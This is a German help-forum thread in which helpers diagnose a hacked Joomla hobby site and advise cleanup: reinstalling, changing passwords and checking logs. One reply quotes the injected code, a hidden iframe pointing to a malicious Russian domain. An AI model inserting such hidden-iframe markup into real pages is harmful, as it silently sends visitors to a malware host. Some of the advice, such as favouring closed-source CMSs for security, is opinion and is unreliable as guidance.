Homepage infiziert? Wie geht es weiter?

Diskutiere Homepage infiziert? Wie geht es weiter? im Viren, Würmer, Spyware Forum im Bereich Computerprobleme; Hallo, bei meiner Homepage www.fussball-sok.de verwende ich joomla. Nun bekomme ich seit einigen Tagen Mails von Usern, welche Meldungen Ihres...

  1. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    Hallo,

    bei meiner Homepage www.fussball-sok.de verwende ich joomla. Nun bekomme ich seit einigen Tagen Mails von Usern, welche Meldungen Ihres Virenprogrammes bekommen, wenn sie meine Seite öffnen.

    Auch ich bekomme ab und zu die Meldung von meinem Viren-Programm AVG: siehe Anhang



    Wie soll ich mich verhalten, habe wenig Ahnung auf dem Gebiet der Viren.

    Bitte dringend um Hilfe, ich komme einfach nicht weiter!



    Gruß und Danke im voraus!
     

    Anhänge:

  2. Anzeige

    schau mal hier: Windows-Wartungs-Tool. Viele Probleme lassen sich damit einfach beheben. Oftmals ist der PC dann auch schneller!
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren.
  3. LowBob

    LowBob Erfahrener Benutzer

    Dabei seit:
    22.06.2009
    Beiträge:
    629
    Zustimmungen:
    0
    Ort:
    Lübeck
    Hm HTML/ Framer hört sich ja an als wenn du irgend ein Script im Joomla verwendest was Farmes öffnet bzw. erzeugt kann das sein?
     
  4. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    ... nicht das ich wüsste. Aber die Seite spinnt nach dem Update ziemlich rum.



    Was kann ich zur Beseitigung der Viren tun?
     
  5. LowBob

    LowBob Erfahrener Benutzer

    Dabei seit:
    22.06.2009
    Beiträge:
    629
    Zustimmungen:
    0
    Ort:
    Lübeck
    Wenn ich die Seite aufrufe sehe ich direkt im Quelltext einen Iframe der als hidden definiert ist.
     
  6. #5 zille3000, 10.08.2009
    zille3000

    zille3000 Master

    Dabei seit:
    30.10.2008
    Beiträge:
    467
    Zustimmungen:
    0
    ich habe mal deine seite aufgerufen,
    ich wurde nach der weiterleitung rausgeschmissen.
     
  7. #6 zille3000, 10.08.2009
    zille3000

    zille3000 Master

    Dabei seit:
    30.10.2008
    Beiträge:
    467
    Zustimmungen:
    0
    hat noch jemand anders zugriff auf die seit (ftp-zugriff oder joomla admin daten)
     
  8. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    ... nein, es hat keiner weiter einen Zugang per FTP oder zum admin!



    Kann ich das joomla unter Angabe der vorhandennen Datenbank nicht einfach neu aufspielen?
     
  9. #8 zille3000, 12.08.2009
    zille3000

    zille3000 Master

    Dabei seit:
    30.10.2008
    Beiträge:
    467
    Zustimmungen:
    0
    das problem is, wenn ein hacker drinn is, ist der in der db.
     
  10. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    ... hm, komischer Weise scheint sich das Problem erledigt zu haben. Habe das aktuelle joomla-update aufgespielt und die Startseite neu hochgeladen - kommt keine Meldung mehr - komisch :huh:
     
  11. PcDc

    PcDc Benutzer

    Dabei seit:
    29.07.2009
    Beiträge:
    63
    Zustimmungen:
    0
    Mein Avast meldet jetzt auch nichts, falls das noch hilft.
     
  12. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    So, da bin ich wieder mit meinem alten Problem. Mehrere User klagen über die Sperre meiner Seite durch ihren Virenscanner/Virenwächter.

    Könnte mir bitte jemand ´nen Tip geben oder die Sache mal prüfen?

    http://www.fussball-sok.de

    Meldung z. B.: Virus: HMTL: Illiframe-B (Trj)

    Kann mir bitte jemand weiterhelfen?
     
  13. Sigi

    Sigi
    Moderator

    Dabei seit:
    14.08.2008
    Beiträge:
    8.341
    Zustimmungen:
    2
    Ort:
    Schillsdorf
    Moin,

    habe Deine Seite aufgerufen, und mich durch alle Links darauf durchgezappt. Kein Problem. Alle Seiten öffnen sich einwandfrei.

    Habe das Antivir (kostenlose Version).
    Könnte auch den Virenscannern liegen.
     
  14. LowBob

    LowBob Erfahrener Benutzer

    Dabei seit:
    22.06.2009
    Beiträge:
    629
    Zustimmungen:
    0
    Ort:
    Lübeck
    Da liegt das Problem:
    Code:
    <div style="display:none"><iframe src="http://age-bio.ru:8080/index.php" width=711 height=895 ></iframe>
    von einer Russischen domain ein eingebundenes Javascript.

    Ich empfehle die mal alle Webserver Passwörter neu zu setzten und Joomla in mit der neusten Version neu drauf zu installieren. Da hat jemand Zugriff auf deine Seite (so das er die Files bearbeiten kann).

    Wirklich alles runter hauen, das geht nur per Backdoor! Ich denk mal der jenige ist über SQL-Injection von Joomla drauf gekommen.

    PS: Du kannst davon ausgehen das alle Adressen, Password-Hashes und Namen der User schon gedumpt wurden.

    EDIT: das ist die Domain age-bio.ru sogar schon bei Mozilla als attackierende Webseite gemeldet.
    EDIT2: Ändere auch umgehend alle identischen Passwörter die du privat benutzt! Das ist der Grund weshalb ich immer sage Finger weg von OpenSource CMS, besonders wenn man selber keine Ahnung von sicherer Webentwicklung hat.
    EDIT3: "Ändere auch umgehend alle identischen Passwörter die du privat benutzt!" Das solltest du auch allen Usern deiner Seite sagen.
     
  15. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    @ LowBob: Danke für die Antwort. Ist dies nun ein spezifisches Problem, das einer meine Seite gezielt manipuliert oder ist dies zur "Zeit in Mode"? Muss ich mir ernsthaft gedanken machen? Werde jetzt erstmal alle Passwörter ändern! Die aktuelle joomla-version ist drauf!

    Wieso sagst Du, Finger weg von OpenSource CMS? Es gibt nun mal Leute wie mich, welche von sicherer Webentwicklung keine Ahnung haben, aber gerne solche Seiten mit ihren vorhandenen Fähigkeiten betreiben. Was könntest Du für solche Leute (also auch für mich) alternativ empfehlen?
     
  16. LowBob

    LowBob Erfahrener Benutzer

    Dabei seit:
    22.06.2009
    Beiträge:
    629
    Zustimmungen:
    0
    Ort:
    Lübeck
    Erstmal alles runterhauen vom Webspace dann Passwörter ändern und ja da manipuliert einer gezielt an deiner Seite rum und der hat auf alles zugriff. Das ist schon seit Jahren Mode, gerade OpenSource CMS sind häufig betroffen, weil auf 100 Freiwillge Entwickler 10000 Hacker kommen die permanent nach Wegen suchen in das System zu kommen.

    Stichwort ist exploit, kannst ja mal bei google eintippen: Joomla Exploit
    Da wird es mit Sicherheit einige geben, hier hatte heute noch jemand genau das selbe Problem. Auf jeden Fall hab ichs so verstanden und das lässt mich denken das es wieder einen neuen Exploit für Joomla gibt und die nun einfach über Suchmaschienen nach Joomla copyrights suchen und denen Seiten ohne Ende geliefert werden.

    Entwerder ein Bezahltes CMS oder ein wenns geht Freeware CMS ohne offen liegendem Code. Wichtig dabei es sollte möglich wenig verbreitet sein. Die Hacker suchen sich hauptsächlich System aus die sich lohnen und Joomla ist nun mal sehr verbreitet.

    Also wenns weiterhin OpenSource sein soll Typo3, wobei auch Typo nicht vor Exploits sicher ist da gabs auch schon einige.

    PS: Wenn die jemand deine Dateien die auf dem Webserver liegen bearbeiten kann, heißt das er kann alles ändern, alles runter- und hochladen und auch auf die Datenbank zugreifen. Du kannst davon ausgehen das der jenige alle Daten die in der Datenbank stehen kopiert hat und da kräftig versucht die Password Hashes entschlüsseln zu lassen.
    Das Datenbank und evtl. auch das FTP Passwort hat er in Klartext in der config.php vor liegen (das Datenbankpasswort hat er also definitiv).
     
  17. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    Ich denke mal, das es mit meiner Galarie 4images zu tun hat. Wenn ich mich dort einlogge meldet sich mein Virenwächter.

    Naja, ich lade gerade erstmal alles runter.

    Was mich wundert, es ist noch nichts passiert. Ausser eine Änderung (bzw. das Änderungsdatum) der index.php hat sich noch nichts getan. Ich hoffe, das dies ein gutes Ende nimmt, bin doch nur ein "Hobby-Homepage-Betreiber-mit-wenig-Ahnung" :S
     
  18. LowBob

    LowBob Erfahrener Benutzer

    Dabei seit:
    22.06.2009
    Beiträge:
    629
    Zustimmungen:
    0
    Ort:
    Lübeck
    Wenn du nur OpenSource Files auf deinem Space hattest kannst du die gerne mal in ein Archiv packen und mir zukommen lassen dann schau ich mal über welche Files sich dort jemand Zugriff verschafft hat. Ich gehe fest davon aus das jemand per SQL-Inject oder File-Inclusion drauf gekommen ist und sich eine Art von PHP Filemanager/Shell drauf gelegt hat.
     
  19. SenSeo

    SenSeo Erfahrener Benutzer

    Dabei seit:
    17.10.2008
    Beiträge:
    189
    Zustimmungen:
    0
    Was heisst denn "nur OpenSource Files"? Denke mal nicht, da ich ´ne Menge auf dem Webspace habe. Kann ich Dir trotzdem mal was zukommen lassen? Die joomla-Dateien oder was genau meinst Du mit OpenSource Files?
     
  20. Anzeige

    Es ist generell erstmal empfehlenswert alle ggf. veralteten oder fehlerhaften Treiber zu scannen und auf neue zu aktualisieren. Hier kannst du einen Treiber-Scanner downloaden. Das erspart oftmals viel Ärger und hilft gegen diverse Probleme.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren.
  21. LowBob

    LowBob Erfahrener Benutzer

    Dabei seit:
    22.06.2009
    Beiträge:
    629
    Zustimmungen:
    0
    Ort:
    Lübeck
    Ich meines alles Packen was aktuell auf deinem Space liegt und meinte nur OpenSouce Files weil ich nicht in irgendwelche von die entwickelten Scripts schauen möchte. Mach ein Archiv legs auf deinen Space und schick mir den Link per PN.
     
  22. #20 helidoc, 24.09.2009
    helidoc

    helidoc killed by a black pudding
    Moderator

    Dabei seit:
    01.06.2007
    Beiträge:
    3.647
    Zustimmungen:
    1
    Ort:
    Bluemchenwiese
    ...ich würde dann aber die ganzen Passwörter wie zB das sqluser:password aus'xxx'en.

    Auch wenn ich mit Joomla zur Zeit nicht wirklich beschäftige. hier ein Rückfragekatalog:
    1. Bei solchen Fragen solltest du immer gleich mit angeben, welche Jomlaversion und welche zusätzlichen Komponenten du benutzt.
    2. Hast du diese auch immer aktuell gehalte - befasst du dich regelmässig mit neuen Sicherheitslücken, bzw. Updates?
    3. Hast du bei deiner Installation auch alles richtig konfiguriert, besonders bezüglich Schreibrechte etc...
    3. Auf was für einer Art Server ist das ganze? Wer kümmert sich hier um die Serversicherheit und wie aktuell ist das ganze?
    4. Hast du generell "sichere" Passwörter gewählt?
    5. "Kann ich das joomla unter Angabe der vorhandennen Datenbank nicht einfach neu aufspielen?" wurde dir ja shcon mit "nein" beantwortet. Wenn du den genauen Zeitpunkt der "feindlichen Übername" kennst, kannst du aber unter Umständen zumindest Datenbankbestände älteren Datums weiterhin nutzen.
    6. Hast du Zugriff zu den logfiles? Damit wäre der "Eindringling" vermutlich leichter zu finden, als den gesammten Sourcecode durchzugehen (ausser, du nutzt eine veraltete Version/Extentions/Templates, die bereits bekannte Löcher haben). Auch derZeitpunkt lässt sich damit genauer feststellen.
    7. Nicht selten erfolgt so ein Angriff auch über ausgespähte ftp-Passwörter. Daher solltest du auch den/die Rechner auf Viren, zB. Keylogger untersuchen, von denen aus du auf den Server zugegriffen hast.
     
Thema: Homepage infiziert? Wie geht es weiter?
Besucher kamen mit folgenden Suchen
  1. html/framer

    ,
  2. html framer virus

    ,
  3. html framer

    ,
  4. homepage infiziert,
  5. virus html framer,
  6. virus html/framer,
  7. joomla index.php infiziert,
  8. index.php infiziert,
  9. html-framer,
  10. html framer virus entfernen,
  11. infizierte homepage,
  12. framer virus,
  13. website mit virus infiziert,
  14. webseite infiziert was tun,
  15. html/framer virus ,
  16. joomla html framer,
  17. js:iframe-rb,
  18. infektion: js:iframe-rb [trj],
  19. htmu framer,
  20. Computervirus infiziert webseite,
  21. html - framer,
  22. Js:injection - A [trj] beseitigen,
  23. homepage ist infiziert,
  24. html/framer virus von website entfernen,
  25. html/framer virus auf website
Die Seite wird geladen...

Homepage infiziert? Wie geht es weiter? - Ähnliche Themen

  1. Pc geht plötzlich aus

    Pc geht plötzlich aus: Mein Pc geht bei Spielen plötzlich unerwartet aus, als würde mann den Netzstecker ziehen. Der Pc ist gereinigt, Hitzestau ist ebenfalls...
  2. PC geht ohne Vorwarnung aus

    PC geht ohne Vorwarnung aus: Hallo zusammen, mein PC schaltet sich zu unterschiedlichsten Zeiten (aber täglich mind. einmal!), unabhängig vom aktuellen Vorgang, einfach ab....
  3. Nach Fehler beim Flashen geht gar nichts mehr

    Nach Fehler beim Flashen geht gar nichts mehr: Hallo zusammen, ich hoffe dass mir jemand von euch weiterhelfen kann. Es geht um Folgendes: Ich habe ein DraginTouch Y88X, das ist ein ganz...
  4. PC geht nach wenigen Sekunden aus

    PC geht nach wenigen Sekunden aus: Hallo zusammen, eins vorweg: Ich habe die Suchfunktion verwendet und auch schon Google benutzt [IMG] Ich habe hier einen PC eines Bekannten...
  5. Computer stürtzt plötzlich ab und geht nicht mehr an

    Computer stürtzt plötzlich ab und geht nicht mehr an: Hi leute hab ein rießen problem, Mein pc ist vorhin abgestürtzt ohne das überaupt was kam, als hätte jemand den stecker raus gesteckt. Als ich...